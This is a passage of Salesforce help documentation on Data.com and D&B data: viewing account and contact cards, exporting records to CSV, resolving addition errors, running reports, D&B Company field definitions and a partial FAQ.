• The record was added to Salesforce from the Data.com
tab. In the process, it was purchased from Data.com and
counted against your monthly addition limit.

• The record was exported from Data.com. In the process,
it was purchased from Data.com and counted against your
monthly addition limit.

The Data.com record corresponding to the Salesforce record
has been marked Inactive. An account or contact record

Inactive

may be inactive if it contains out-of-date or inaccurate
information. An account record may also be inactive if it’s
non-marketable. A non-marketable company, as defined by
D&B, is one that is out of business or has requested exclusion
from the D&B database. It also includes companies whose
D&B record has not been updated in the past 24 months or
does not include a complete business name, a valid physical
or mailing address, a valid phone number, or an SIC code.
Inactive records are hidden by default.

See Also:
Finding and Adding Accounts from Data.com
Adding Data.com Contacts as Leads
Getting Data.com Contacts from an Account
Finding and Adding Data.com Contacts from the Data.com Tab
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Exploring Data.com Accounts from the Account Card
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

No permissions requiredTo search Data.com for accounts:

From a list of Data.com account search results, just click the name of any account and its account card appears. Use the account
card to research the company, get an overview of its business, or view a breakdown of its contacts. Key Dun & Bradstreet
(D&B) data is available.

Tip:  You can view the account card for any of your Salesforce accounts that exist in Data.com. Just do a quick search
for the account on the Data.com tab.

Here are your options.

1. Get address and phone information plus a link to the account’s website.
2. View the account’s demographic and financial data. The Account Site field identifies whether the company is a

headquarters, a branch, or a single location.
3. Identify the source of the account information (D&B or Jigsaw), and find out when the source’s information was last

updated.
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4. Click an icon to research the account by searching Google, LinkedIn, or Yahoo Finance. If the account’s data comes from
Jigsaw, you’ll see an icon for Data.com and can search there.

5. Click the Data.com Contacts tab to see the account’s Data.com contact breakdown by level and department. Click a number
to find the account’s contacts at that level on the Salesforce Data.com tab.

6. Click the Overview tab to get a detailed company description from D&B (if available).
7. Click the Additional D&B Data tab to view the additional D&B fields available, including D-U-N-S Number and NAICS

Code.

Note: You can’t see the entire D-U-N-S Number value for an account (on the comparison page or the account
card) until the account has been added to Salesforce from Data.com or (for existing records) cleaned with Data.com.
Until you add or clean the record, the number’s first five digits are masked with asterisks (*).

See Also:
Finding and Adding Accounts from Data.com
Understanding Data.com User Types, Licenses, and Limits

Exploring Data.com Contacts from the Contact Card
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

No permissions requiredTo search Data.com for contacts:

Note:  If your search produces a large number of results, contact cards will not be available past page 10. If this
happens, have your system administrator contact salesforce.com Customer Support to enable unlimited view.

From your Data.com contact search results, you can view any contact's contact card. Use the contact card to research a contact,
do social networking, or find the address of the organization where the contact works.

To view a contact card, just click the contact's name in the list of search results.

Tip:  You can view the contact card for any of your Salesforce contacts that exist in Data.com. Just do a quick search
for the contact on the Data.com tab.
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Here are your options.

1. Get the contact's title, address, phone, and email.
2. Get the name and address of the company the contact works for.
3. Search for the contact on Google, LinkedIn, or Data.com.

See Also:
Finding and Adding Data.com Contacts from the Data.com Tab
Understanding Data.com User Types, Licenses, and Limits

Resolving Data.com Record Addition Errors
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Create” on accountsTo add accounts from Data.com:

“Create” on contactsTo add contacts from Data.com:

“Read” on accounts AND “Create” on contactsTo add Data.com contacts from an account

“Create” on leadsTo add Data.com contacts as leads

If errors are preventing you from adding one or more Data.com records to Salesforce, we’ll provide a .csv error log file. How
we provide the error log depends on what you were trying to do.

• If you were trying to add fewer than 200 records, you’ll see a message with a link to the error log on the Files tab.
• If you were trying to add 200 records or more, you’ll receive an email with a link to the error log on the Files tab.
• If you were trying to add any number of records and you do not have Chatter enabled, you’ll receive an email with the error

log attached.

1. Open the record addition error log and review the errors, then take one of these actions.
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• If you see errors regarding duplicate records, you don’t need to do anything. “Duplicate” errors mean that the records
are already in Salesforce, so you don’t need to add them again. If your Data.com preferences are set to allow duplicates,
the error log will not include any “duplicate” errors.

• If you see errors regarding your organization’s custom configurations, such as triggers, validation rules, or workflow,
let your system administrator know because they may need to correct these configurations.

• For all other errors, contact your system administrator, who may need to contact Support.

2. After the errors have been resolved, try again to add the Data.com records to Salesforce.

See Also:
Finding and Adding Accounts from Data.com
Finding and Adding Contacts from Data.com

Exporting Data.com Account Records
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Read” on accountsTo export Data.com accounts records:

If you want to work with Data.com account records in other programs, you can export them from your search results on the
Data.com tab. Exporting creates a comma-separated value (.csv) file that you can open in Microsoft Excel or any program
that supports .csv format.

How we provide the export file depends on:

• The number of records. If you were trying to export fewer than 200 records, you’ll see a message with a link to the export
file on the Files tab. If you were trying to export 200 records or more, you’ll receive an email with a link to the export file
on the Files tab.

• Whether you have Chatter enabled. If you do not, you’ll receive an email with the export file attached.

The account fields that are exported are:

• Jigsaw (the account’s Data.com Key)
• Name

• Website

• Phone

• BillingStreet

• BillingCity

• BillingState

• BillingPostalCode

• BillingCountry

• Industry
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• NumberOfEmployees

• AnnualRevenue

• Ownership

• TickerSymbol

• Fax

• FipsMsaCode (Data.com Premium Prospector only)
• Sic

• SicDesc

• NaicsCode

• NaicsDesc

• StockExchange (Data.com Premium Prospector only)
• SalesVolumeReliability (Data.com Premium Prospector only)
• EmployeesTotalReliability (Data.com Premium Prospector only)
• Data.com Last Updated Date

1. Start from a list of Data.com account search results.
2. Export all accounts or a selection.

• To export all accounts, click Export Results and choose All.
• To export selected accounts, select the ones you want, then click Export Results and choose Selected.

3. Choose whether you want to exclude records that are already in Salesforce ( ) or that were already purchased by any

Data.com user in your organization ( ).
4. Click Continue.

A dialog box appears. It will either include a link to the export file on the Files tab or inform you that the export file will
be sent in an email.

See Also:
Guidelines for Exporting and Importing Data.com Records
Data.com Contact Search Fields and Filters

Exporting Data.com Contact Records
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Read” on contactsTo export contacts:

If you want to work with Data.com contact records in other programs, you can export them from your search results on the
Data.com tab. Exporting creates a comma separated value (.csv) file that you can open in Microsoft Excel or any other
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program that supports .csv format. If your organization respects Do-Not-Contact settings, contact records with Do Not
Call or Email Opt Out selected have blank Phone or Email fields in. csv files.

How we provide the export file depends on:

• The number of records. If you were trying to export fewer than 200 records, you’ll see a message with a link to the export
file on the Files tab. If you were trying to export 200 records or more, you’ll receive an email with a link to the export file
on the Files tab.

• Whether you have Chatter enabled. If you do not, you’ll receive an email with the export file attached.

The contact fields that are exported are:

• Jigsaw (the contact's Data.com Key)
• FirstName

• LastName

• Title

• Phone

• Email

• MailingStreet

• MailingCity

• MailingState

• MailingPostalCode

• MailingCountry

• AccountName

• NumberofEmployees

• AnnualRevenue

• Department

• Industry

• Data.com Last Updated Date

1. Start from a list of Data.com contact search results.
2. Export all contacts or a selection.

• To export all contacts, click Export Results and choose All.
• To export selected contacts, select the ones you want, then click Export Results and choose Selected.

3. Choose whether you want to exclude records that are already in Salesforce ( ) or that were already purchased by any

Data.com user in your organization ( ).
4. Click Continue.

A dialog box appears. It will either include a link to the export file on the Files tab or inform you that the export file will
be sent in an email.

See Also:
Guidelines for Exporting and Importing Data.com Records
Data.com Contact Search Fields and Filters
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Guidelines for Exporting and Importing Data.com Records
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

If you want to work with Data.com account records in other programs, you can export them from your search results on the
Data.com tab. Exporting creates a comma-separated value (.csv) file that you can open in Microsoft Excel or any program
that supports .csv format.  Here are some things to consider when exporting records sourced from Data.com.

• If you export Data.com contacts or accounts instead of adding them to Salesforce, each exported record counts against your
monthly record addition limit. If you export records you've already added to Salesforce or re-export contacts you previously
exported, the exported records don’t count against your monthly record addition limit.

• A green dot ( ) appears in the search results next to records already in Salesforce. A blue checkmark ( ) appears in the
search results next to records that were already purchased by any Data.com user in your organization. You can exclude
those records from the export by selecting that option on the export confirmation message.

• If you export a group of Data.com contacts, then add those same contacts to Salesforce as leads, you can still add those
contacts back into Salesforce as contacts.

• If your organization respects Do-Not-Contact settings, contact records with Do Not Call or Email Opt Out selected
have blank Phone or Email fields in. csv files.

• You can export only as many records as your monthly addition limit allows. If you’re trying to export a number of records
that exceeds your limit, you’ll see a message that lets you know the number of remaining additions you have. If you’ve
reached your monthly record addition limit, you can’t export any records.

• Regardless of your monthly addition limit or the number of records you have left to add, you can't export more than 50,000
records at a time. If you try, you’ll see a prompt to refine your list.

• If numeric values, such as phone numbers, are cut off in the .csv file, change the format of the field’s column in the .csv
file to General or Text, or open the file in a text editor such as WordPad.

You can import the list of records back into Salesforce using Data Loader. Unless your Data.com preferences are set to allow
duplicate records, the import process checks for duplicates using the Data.com ID number from the Data.com Key field.

These records won’t be imported from Data Loader.

• Any record that has the same Data.com ID (from the Data.com Key field) as another record within the .csv file.

• Any record that has the same Data.com ID (from the Data.com Key field) as a record already in Salesforce.

See Also:
Exporting Data.com Account Records
Exporting Data.com Contact Records
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Using Data.com Reports and Dashboards
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Run reports”To run Data.com reports:

The Data.com Reports AppExchange package offers several preconfigured reports and two corresponding dashboards. The
reports available on the Data.com Analytics dashboard are used primarily by sales operations and those responsible for keeping
your Salesforce data clean. The reports available on the Data.com Impact dashboard are used primarily by sales management
to see the value Data.com is providing in terms of converted leads, sales forecast, and revenue. This table describes each report.

DescriptionReport

Which clean status does each account have? Grouped by clean
status.

Accounts by Clean Status

Which accounts have been added from Data.com? Grouped
by date and creator.

Accounts from Data.com

Which accounts are matched to Data.com records and are
therefore managed records?

Accounts Managed by Data.com

Which accounts have the same Data.com key and are likely
duplicate records? Grouped by Data.com key.

Accounts with Duplicate Data.com Keys

Which clean status does each contact have? Grouped by clean
status.

Contacts by Clean Status

Which contacts have been added from Data.com? Grouped
by date and creator.

Contacts from Data.com

Which contacts are matched to Data.com records and are
therefore managed records?

Contacts Managed by Data.com

Which contacts have the same Data.com key and are likely
duplicate records? Grouped by Data.com key.

Contacts with Duplicate Data.com Keys

Which converted leads were sourced from Data.com?Converted Leads from Data.com

How many records are processed, matched, and cleaned on a
daily basis?

Data.com Clean Daily Metrics

What is the sales forecast from open opportunities with
account or lead records matched from Data.com?

Forecast Data.com-Matched Opportunities

What is the sales forecast from open opportunities with
account or lead records added from Data.com?

Forecast Data.com-Sourced Opportunities

Which clean status does each lead have? Grouped by clean
status.

Leads by Clean Status

881

Using Data.com Reports and DashboardsManaging the People and Organizations You Sell To



DescriptionReport

Which leads have been added from Data.com? Grouped by
date and creator.

Leads from Data.com

Which leads matched Data.com and are therefore managed
records?

Leads Matched to Data.com Records

Which leads have the same Data.com key and are likely
duplicate records? Grouped by Data.com key.

Leads with Duplicate Data.com Keys

Which accounts matched to Data.com records were last
modified by Data.com Clean? Accounts are considered to be

Matching Accounts Last Modified by Clean

modified by Clean if there are changes to any fields, including
Clean Status, and the changes were made either manually
or via automated jobs. If the record was later edited by another
user, it won’t appear in this report. Grouped by last modified
date.

Which contacts matched to Data.com records were last
modified by Data.com Clean? Contacts are considered to be

Matching Contacts Last Modified by Clean

modified by Clean if there are changes to any fields, including
Clean Status, and the changes were made either manually
or via automated jobs. If the record was later edited by another
user, it won’t appear in this report. Grouped by last modified
date.

Which leads matched to Data.com records were last modified
by Data.com Clean? Leads are considered to be modified by

Matching Leads Last Modified by Clean

Clean if there are changes to any fields, including Clean
Status, and the changes were made either manually or via
automated jobs. If the record was later edited by another user,
it won’t appear in this report. Grouped by last modified date.

What percentage of converted leads were added from
Data.com?

Percentage Converted Leads from Data.com

What percentage of sales forecast is from open opportunities
with account or lead records matched to Data.com and are
therefore managed records?

Percentage Forecast Matched to Data.com

What percentage of leads are matched to Data.com and are
therefore managed records?

Percentage Leads Matched to Data.com

What percentage of revenue is from opportunities associated
with account or lead records that match to Data.com?

Percentage Revenue Matched to Data.com

What percentage of my sales forecast comes from account or
lead records added from Data.com?

Percentage Sales Forecast from Data.com

What percentage of my sales revenue came from account or
lead records added from Data.com?

Percentage Sales Revenue from Data.com

What is the sales revenue amount from closed-won
opportunities with account or lead records matched from
Data.com?

Revenue Data.com-Matched Opportunities
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DescriptionReport

What is the sales revenue amount from closed-won
opportunities with account or lead records added from
Data.com?

Revenue Data.com-Sourced Opportunities

To run any Data.com report, just click the Reports tab, expand the Data.com list, and select the one you want.

To view Data.com reports as dashboards, just click the Dashboards tab. In the View Dashboards drop-down, under
Data.com, select Data.com Impact or Data.com Analytics.

See Also:
Installing and Implementing the Data.com Reports AppExchange Package

GETTING EXPANDED DATA FOR ACCOUNTS AND LEADS

D&B Companies Overview
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

Dun & Bradstreet (D&B) is the world’s leading source of commercial information and insight on businesses, enabling companies
to Decide with Confidence® for over 170 years. D&B’s global database contains the world’s largest source of business records,
and is backed by D&B’s proprietary DUNSRight® quality assurance process, ensuring you that company information is
complete and accurate.

As part of the Salesforce Data.com solution, D&B gives users integrated access to its trusted global database of millions of
companies and corporate structures, and over 70 fields of company information, such as D-U-N-S Number and NAICS
industry codes, directly in Salesforce.

D&B Companies is available to organizations that purchase Data.com Premium Prospector or Data.com Premium Clean.
Here’s how it works.

When an account or lead record is added to Salesforce, a D&B Company record is automatically created and linked to that
account via the record’s D&B Company field. Cleaning an account or lead record, either manually or via automated jobs, also
creates a D&B Company record if you don’t yet have one in Salesforce. Just click the link in the D&B Company field to open
the D&B Company record and view the rich set of D&B data, including a Company Description field, plus sections like
Primary Data and Firmographic Data. If the D&B Company record is linked to an account, the Accounts related list on the
page links back to the account record.

For example, if you add an account record for Starbucks, when you open its record, the D&B Company field value is Starbucks
Corporation. The value is underlined to identify it as a link. Just click the link to open the Starbucks Corporation D&B
Company record.
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For accounts and leads not added from Data.com (those created manually, for example), if a corresponding D&B Company
record exists, it is added to Salesforce and linked to the account or lead record the first time that record is cleaned.

If your company also uses Data.com Premium Clean, you can use automated jobs to update your D&B Company records.

See Also:
Finding and Adding Accounts from Data.com
Cleaning Records Manually with Data.com Clean

D&B Company Fields
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

Organizations that have purchased Data.com Premium Prospector or Data.com Premium Clean have access to our complete
set of Dun & Bradstreet (D&B) data—over 70 fields. When an account or lead record is added to Salesforce, a D&B Company
record is automatically created and linked to that account via the record’s D&B Company field. Cleaning an account or lead
record, either manually or via automated jobs, also creates a D&B Company record if you don’t yet have one in Salesforce.
This topic defines the fields you’ll see on D&B Company records.

Note:  Some D&B field labels are different from the object field labels they are mapped to. For example, the Account
Site field on account records maps to the Location Type field on the linked D&B Company record. For a list
of default mappings, see Default Data.com-to-Salesforce Field Mappings. on page 1414

DescriptionField

The total annual sales revenue in local currency. D&B tracks
revenue data for publicly traded companies, Global Ultimates,

Annual Sales Volume

Domestic Ultimates, and some headquarters. D&B does not
supply this data for branch locations.

The reliability of the Annual Sales Volume figure. Available
values are Actual number, Low, Estimated (for all

Annual Sales Volume Indicator

records), Modeled (for non-US records). A blank
value indicates this data is unavailable.

A brief description of the company, which may include
information about its history, its products and services, and

Company Description

its influence on a particular industry. This data is supplied by
Hoover’s.

The probability that a company will pay with a significant
delay compared to the agreed terms. The risk level is based

Delinquency Risk

on the standard Commercial Credit Score, and ranges from
low risk to high risk. Also known as marketing prescreen.
Available values are High risk of delinquency, Low
risk of delinquency, and Moderate risk of
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DescriptionField

delinquency. D&B supplies this data for US organizations
only.

The primary name of the Domestic Ultimate, which is the
highest ranking subsidiary, specified by country, within an
organization’s corporate structure.

Domestic Ultimate Business Name

The D-U-N-S Number for the Domestic Ultimate, which is
the highest ranking subsidiary, specified by country, within
an organization’s corporate structure.

Domestic Ultimate D-U-N-S Number

The Data Universal Numbering System (D-U-N-S) number
is a unique, nine-digit number assigned to every business

D-U-N-S Number

location in the D&B database that has a unique, separate, and
distinct operation. D-U-N-S numbers are used by industries
and organizations around the world as a global standard for
business identification and tracking.

The company’s facsimile number.Facsimile Number

An additional NAICS code used to further classify an
organization by industry. See Primary NAICS Code.

Fifth NAICS Code

A brief description of an organization’s line of business, based
on the corresponding NAICS code. See Primary NAICS
Description.

Fifth NAICS Description

An additional SIC code used to further classify an organization
by industry. See Primary SIC Code.

Fifth SIC Code

A brief description of an organization’s line of business, based
on the corresponding SIC code. See Primary SIC Description.

Fifth SIC Description

An additional tradestyle used by the organization. See Primary
Tradestyle.

Fifth Tradestyle

The Federal Information Processing Standards (FIPS) and
the Metropolitan Statistical Area (MSA) codes identify the

FIPS MSA Code

organization’s location. The MSA codes are defined by the
US Office of Management and Budget. D&B supplies this
data for US organizations only.

A brief description of an organization’s FIPS MSA code.
D&B supplies this data for US organizations only.

FIPS MSA Code Description

An additional NAICS code used to further classify an
organization by industry. See Primary NAICS Code.

Fourth NAICS Code

A brief description of an organization’s line of business, based
on the corresponding NAICS code. See Primary NAICS
Description.

Fourth NAICS Description

An additional SIC code used to further classify an organization
by industry. See Primary SIC Code.

Fourth SIC Code

A brief description of an organization’s line of business, based
on the corresponding SIC code. See Primary SIC Description.

Fourth SIC Description
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DescriptionField

An additional tradestyle used by the organization. See Primary
Tradestyle.

Fourth Tradestyle

The level of accuracy of a location’s geographical coordinates
compared with its physical address. Available values include

Geocode Accuracy

Rooftop level, Street level, Block level,
Census tract level, and Mailing address level.

The primary name of the Global Ultimate, which is the highest
entity within an organization’s corporate structure and may
oversee branches and subsidiaries.

Global Ultimate Business Name

The D-U-N-S Number of the Global Ultimate, which is the
highest entity within an organization’s corporate structure and
may oversee branches and subsidiaries.

Global Ultimate D-U-N-S Number

Identifies whether a business imports goods or services, exports
goods or services, and/or is an agent for goods.

Import/Export

The required code for international calls.International Dialing Code

The geographical coordinates that specify the north-south
position of a point on the Earth’s surface. Used with longitude

Latitude

to specify a precise location, which is then used to assess the
Geocode Accuracy.

Identifies the legal structure of an organization. Available
values include Cooperative, Nonprofit

Legal Structure

organization, Local government body,
Partnership of unknown type, and Foreign
company.

The currency in which the company’s sales volume is expressed.
The full list of values can be found at the Optimizer Resources
page maintained by D&B.

Local Currency Code

The code used to represent a company’s local currency. This
data is provided by the International Organization for

Local Currency ISO Code

Standardization (ISO) and is based on their three-letter
currency codes. For example, USD is the ISO code for United
States Dollar.

Indicates whether a company owns or rents the building it
occupies.

Location Ownership Indicator

Identifies the organizational status of a company. Available
values are Single location, Headquarters/Parent,
and Branch.

Location Type

The geographical coordinates that specify the east-west
position of a point on the Earth’s surface. Used with latitude

Longitude

to specify a precise location, which is then used to assess the
company’s Geocode Accuracy.
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DescriptionField

The address where a company has its mail delivered. If the
mailing address is the same as the primary address, this field
will be blank.

Mailing Address

Twenty-two distinct, mutually exclusive profiles, created as a
result of cluster analysis of D&B data for US organizations.

Marketing Segmentation Cluster

Available values include High-Tension Branches of
Insurance/Utility Industries, Rapid-Growth
Large Businesses, Labor-Intensive Giants,
Spartans, Main Street USA. D&B supplies this data
for US organizations only.

Indicates whether an organization is owned or controlled by
a member of a minority group. D&B supplies this data for US
organizations only.

Minority-Owned Indicator

The identification number used in some countries for business
registration and tax collection. This field does not apply to
US organizations.

National Identification Number

Identifies the type of national identification number used. The
full list of values can be found at the Optimizer Resources
page maintained by D&B.

National Identification System

The total number of family members, worldwide, within an
organization, including the Global Ultimate, its subsidiaries
(if any), and its branches (if any).

Number of Business Family Members

The total number of employees at the Global Ultimate, which
is the highest entity within an organization’s corporate
structure and may oversee branches and subsidiaries.

Number of Employees—Global

The number of employees at a specified location, such as a
branch location.

Number of Employees—Location

The reliability of the Number of Employees—Location figure.
Available values are Actual number, Low, Estimated

Number of Employees—Location Indicator

(for all records), Modeled (for non-US
records). A blank value indicates this data is unavailable.

The total number of employees in the company, including all
subsidiary and branch locations. This data is only available on

Number of Employees—Total

records that have a value of Headquarter/Parent in the
Location Type field.

The reliability of the Number of Employees–Total figure.
Available values are Actual number, Low, Estimated

Number of Employees—Total Indicator

(for all records), Modeled (for non-US
records). A blank value indicates this data is unavailable.

Indicates whether the company at the specified address has
discontinued operations.

Out of Business Indicator

Indicates whether ownership of the company is public or
private. The subsidiaries of a publicly traded parent company

Ownership Type Indicator
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DescriptionField

will show a value of Private unless the subsidiaries are
independently traded.

The primary name of the parent or headquarters company.Parent Company Business Name

The D-U-N-S Number for the parent or headquarters.Parent Company D-U-N-S Number

The address where a company is physically located. This field
is Billing Address on account records.

Primary Address

The primary or registered name of a company.Primary Business Name

The six-digit North American Industry Classification System
(NAICS) code is the standard used by business and

Primary NAICS Code

government to classify business establishments according to
their economic activity for the purpose of collecting, analyzing,
and publishing statistical data related to the US business
economy. The full list of values can be found at the Optimizer
Resources page maintained by D&B.

A brief description of an organization’s line of business, based
on its NAICS code.

Primary NAICS Description

The four-digit Standard Industrial Classification (SIC) code
is used to categorize business establishments by industry. The

Primary SIC Code

full list of values can be found at the Optimizer Resources
page maintained by D&B.

A brief description of an organization’s line of business, based
on its SIC code.

Primary SIC Description

A name, different from its legal name, that an organization
may use for conducting business. Similar to “Doing business
as” or “DBA”.

Primary Tradestyle

An additional NAICS code used to further classify an
organization by industry. See Primary NAICS Code.

Second NAICS Code

A brief description of an organization’s line of business, based
on the corresponding NAICS code. See Primary NAICS
Description.

Second NAICS Description

An additional SIC code used to further classify an organization
by industry. See Primary SIC Code.

Second SIC Code

A brief description of an organization’s line of business, based
on the corresponding SIC code. See Primary SIC Description.

Second SIC Description

An additional tradestyle used by the organization. See Primary
Tradestyle.

Second Tradestyle

An additional NAICS code used to further classify an
organization by industry. See Primary NAICS Code.

Sixth NAICS Code

A brief description of an organization’s line of business, based
on the corresponding NAICS code. See Primary NAICS
Description.

Sixth NAICS Description
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DescriptionField

An additional SIC code used to further classify an organization
by industry. See Primary SIC Code.

Sixth SIC Code

A brief description of an organization’s line of business, based
on the corresponding SIC code. See Primary SIC Description.

Sixth SIC Description

Indicates whether the company is designated a small business
as defined by the Small Business Administration of the US

Small Business Indicator

government. D&B supplies this data for US organizations
only.

The corresponding exchange for a company’s ticker symbol.
For example: NASDAQ or NYSE.

Stock Exchange

Indicates whether a company is more than 50 percent owned
by another organization.

Subsidiary Indicator

A company’s primary telephone number.Telephone Number

An additional NAICS code used to further classify an
organization by industry. See Primary NAICS Code.

Third NAICS Code

A brief description of an organization’s line of business, based
on the corresponding NAICS code. See Primary NAICS
Description.

Third NAICS Description

An additional SIC code used to further classify an organization
by industry. See Primary SIC Code.

Third SIC Code

A brief description of an organization’s line of business, based
on the corresponding SIC code. See Primary SIC Description.

Third SIC Description

An additional tradestyle used by the organization. See Primary
Tradestyle.

Third Tradestyle

The abbreviation used to identify publicly traded shares of a
particular stock. Also known as the stock symbol.

Ticker Symbol

An organization’s primary website address.URL

The identification number for the company used by the
Internal Revenue Service (IRS) in the administration of tax

US Tax ID Number

laws. Also referred to as Federal Taxpayer Identification
Number. D&B supplies this data for US organizations only.

Indicates whether a company is more than 50 percent owned
or controlled by a woman. D&B supplies this data for US
organizations only.

Woman-Owned Indicator

The year the company was established or the year when current
ownership or management assumed control of the company.

Year Started

If the company establishment or ownership year is unavailable,
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DescriptionField

then the year the D&B record was created will be used. D&B
does not supply this data for branch locations.

See Also:
D&B Companies Overview
Finding and Adding Accounts from Data.com

Finding and Adding Data.com Accounts by Global Ultimate
D-U-N-S Number

Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Create” on accountsTo add accounts from Data.com

If you use Data.com Premium Prospector, you can search D&B Company records by Global Ultimate D-U-N-S Number to
see a list of accounts within an organizations’s corporate structure and then add those accounts to Salesforce. The Global
Ultimate is the highest entity within an organization and is identified by a nine-digit Global Ultimate D-U-N-S Number.
All companies that are part of the same corporate structure as the Global Ultimate are identified by the same Global Ultimate
D-U-N-S Number.

Note:  Before you can search by Global Ultimate D-U-N-S Number, the Search Global Ultimate D-U-N-S
button must be  added to the D&B Company page layout.

1. Go to the detail page of the D&B Company record you want to find accounts with the same Global Ultimate D-U-N-S
Number for.

2. Click Search Global Ultimate D-U-N-S.
The Data.com tab opens and displays a list of accounts that match the Global Ultimate D-U-N-S Number of the D&B
Company record.

3. If the results list is long, you can sort the results by any table heading. The Location Type heading, for example, sorts
results by headquarters, single location, and branch.

4. If you don’t see what you’re looking for, use filters to narrow your results.
5. For more information about a particular account, such as its account site, click the account name to see its account card.
6. Add all accounts or a selection to Salesforce.
7. From the confirmation message, click Go to Accounts to view the list of new records on the Accounts home page.

Here are some things to keep in mind when searching by Global Ultimate D-U-N-S Number.
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• Global Ultimate D-U-N-S Number search results only include accounts that are in Data.com, so you may not get complete
Global Ultimate D-U-N-S results if some members of the corporate structure are not in Data.com.

• You can use filters to narrow down your Global Ultimate D-U-N-S Number search results.
• You can export records from your Global Ultimate D-U-N-S Number search results.
• You can’t save the search.

See Also:
Finding and Adding Accounts from Data.com

Data.com FAQs
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

• Administering Data.com FAQ

• Using Data.com FAQ

Using Data.com FAQ

Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

• How can I find out which Data.com user type I am?

• How can I improve my Data.com search results?

• Why do I see companies I didn’t search for in my Data.com search results?

• How can I find out how many Data.com records I can add to Salesforce?

• When I add CRM records from Data.com, how do I know which field values have Data.com data?

• What does the Account Site field value on an Account record mean?

• Why does the Ownership field have a value of Private for companies I know are public?

• I’m seeing a discrepancy between the numbers in the Employees and Contacts fields on an Account record. Why?

• I use Data.com and I’m seeing a blank or zero (0) value in the Employee and Revenue fields. Why?

• Why do some leads have a blank or zero (0) value in the Annual Revenue and Number of Employees fields after I
use the Data.com Clean auto-fill feature?

• When I use the Employees or Revenue filter to refine my account or contact search results, I get far fewer results than I
expect. Why?

• Why do some account and D&B Company records have identical D-U-N-S Numbers?
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• What is the difference between the Account Site and Location Type fields?

See Also:
Data.com FAQs

How can I find out which Data.com user type I am?
It’s easy. Access your personal information in your personal settings. The Data.com User Type field identifies you as either
a Data.com User or a Data.com List User. If the field is blank, you do not have a Data.com user license.

For a quick definition of your Data.com user type, just click the info icon ( ) next to the field. For complete details, see the
help topic Understanding Data.com User Types, Licenses, and Limits on page 1418.

See Also:
Data.com FAQs

How can I improve my Data.com search results?

It’s easy. Just use search modifiers. To see examples, just click the info icon ( ) above each search field on the Data.com tab.
It’s also helpful to save searches you use frequently.

See Also:
Understanding Data.com Searches

Why do I see companies I didn’t search for in my Data.com search results?
For account searches, the Data.com search results you get are based on the company name, the website of the parent company,
and the websites of the parent company’s subsidiaries and branch locations, if any, so your results may include companies that
you didn’t actually search for. For example, if you want to find Sun Microsystems and you enter either Sun Microsystems
or sun.com in the Company or Website field, the results will also include Oracle Corporation because Oracle is the parent
company of Sun Microsystems..

See Also:
Understanding Data.com Searches
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How can I find out how many Data.com records I can add to Salesforce?
First, find out which Data.com user type you are on page 892. If you’re a Data.com User, access your personal information in
your personal settings and select the Data.com Monthly Addition Limit field. Monthly limits are set by your system
administrator and expire at the end of each month.

If you’re a Data.com List User, you share record additions from a pool with all other List Users in your organization. Your
organization’s pool has a limit, so if one Data.com List User reaches the limit, other Data.com List Users can’t add records.

If adding a set of records would cause you to exceed your addition limit, you’ll see a message that tells you how many additions
you have left. If you still need to add more records, contact your system administrator.

See Also:
Data.com FAQs

When I add CRM records from Data.com, how do I know which field values
have Data.com data?

Just check the help topics that define the fields on those records. All fields that are enabled for Data.com data are identified.

• Account Fields

• Contact Fields

• Lead Fields

See Also:
Data.com FAQs

What does the Account Site field value on an Account record mean?
Headquarters/Parent indicates that a company is a legal entity with other locations.

Single location indicates that a company is a headquarters with no other locations, and that it may or may not be a
distinct legal entity.

Branch indicates that a company is not a distinct entity. Rather, a branch is a location of a headquarters or parent company.

See Also:
What is the difference between the Account Site and Location Type fields?
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Why does the Ownership field have a value of Private for companies I
know are public?

Dun & Bradstreet (D&B), who provides this data, only tracks ownership information for headquarters or parent companies.
If a publicly traded headquarters or parent company has any subsidiaries, such as branch locations, those subsidiaries show a
value of Private unless they are traded independently. The value will also be Private if the ownership type is unknown.

See Also:
What does the Account Site field value on an Account record mean?

I’m seeing a discrepancy between the numbers in the Employees and
Contacts fields on an Account record. Why?

There are a number of possible reasons.

• The number of employees is only available on records that have a value of Headquarters/Parent in the Account
Site field. This means that a branch location may show a value of zero in the Employees field but still have a number
of contacts.

• The Employees field on Account records shows the total number of employees within a company, including all subsidiary
and branch locations. The number of contacts, however, reflects only the contacts at that specific location. So a headquarters
location that has 5,000 employees throughout its various locations may only have 3,000 contacts at the headquarters location.

• Employee totals come from Dun & Bradstreet (D&B) and usually do not include contract employees. Contact totals and
related data come from the Data.com community and often do include contract employees as long as they have a valid
company email address.

See Also:
Data.com FAQs

I use Data.com and I’m seeing a blank or zero (0) value in the Employee
and Revenue fields. Why?

